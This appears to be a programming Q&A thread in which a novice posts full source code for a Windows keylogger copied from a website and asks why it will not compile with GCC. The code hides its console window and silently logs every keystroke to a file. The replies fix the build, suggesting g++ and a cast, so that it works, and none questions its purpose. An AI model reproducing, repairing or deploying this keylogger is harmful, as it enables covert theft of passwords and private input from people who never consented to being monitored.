# GCC: cannot find iostream compilation error

Tags: gcc, compilation, command-prompt, iostream

First thing is that I don't know much about programming at all. I got some C code off of a site that isn't working; when I attempt to compile this keylogger:

```
#include <iostream>
#include <Windows.h>
using namespace std;
int Save(int _key, char *file);
int main() {
 FreeConsole();
char i;
while (true) {
 Sleep(10);
 for (i = 8; i <= 255; i++) {
 if (GetAsyncKeyState(i) == -32767) {
 Save(i, "log.txt");
 }
 }
 }
 return 0;
}
int Save(int _key, char *file) {
cout << _key << endl;
Sleep(10);
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
if (_key == VK_SHIFT)
 fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
 else if (_key == VK_BACK)
 fprintf(OUTPUT_FILE, "%s", "[BACK]");
 else if (_key == VK_LBUTTON)
 fprintf(OUTPUT_FILE, "%s", "[LBUTTON]");
 else if (_key == VK_RETURN)
 fprintf(OUTPUT_FILE, "%s", "[RETURN]");
 else if (_key == VK_ESCAPE)
 fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
 else
 fprintf(OUTPUT_FILE, "%s", &_key);
fclose(OUTPUT_FILE);
return 0;
}
```

command prompt gives me

```
fatal error: iostream: No such file or directory
compilation terminated.
```

I've also tried

```
#include <iostream.h>
```

instead of

```
#include <iostream>
```

and got the same error.
How do I compile the code? Is there something *wrong* with it, and if so how do I fix it? Thanks! (And if you could make it easy for a luddite like me to understand, I'd really appreciate it)
Using GCC to compile, Windows 10 64-bit

Comment: How did you run your compiler? Inclusion of `iostream` would actually indicate C++ code and I have a slight suspicion you told `gcc` to compile C and not C++. (which would not consider and possible even understand corresponding header locations). Try calling `g++` instead.

Comment: that got rid of the iostream problem, but now it's giving me other errors: warning: deprecated conversion from string constant to 'char*' [-Wwrite-strings]
  Save(i, "log.txt"); with a ^ pointing to the close parenthesis.

Comment: Update the question I guess?

Answer (score 0):

You need to tell GCC to link against the C++ library.  Using g++ instead of gcc will force this.

The error is because fprintf with the %s formatter requires the a pointer to a char, you're passing a pointer to an int, in this situation you can simply cast to a char*

```
fprintf(OUTPUT_FILE, "%s", reinterpret_cast<char*>(&_key));
```

Then it will work.

Answer (score 0):

Check that the filename of your C++ program is ".cpp".

Same as you, my C++ program couldn't find the right header files.  In my situation, I simply had to rename my ".c" file to ".cpp" so that the Makefile would do the right thing and find the header files and libraries.

gcc is also C++ compiler so changing to g++ (which should also work), isn't necessary. Background on GCC: https://www3.ntu.edu.sg/home/ehchua/programming/cpp/gcc_make.html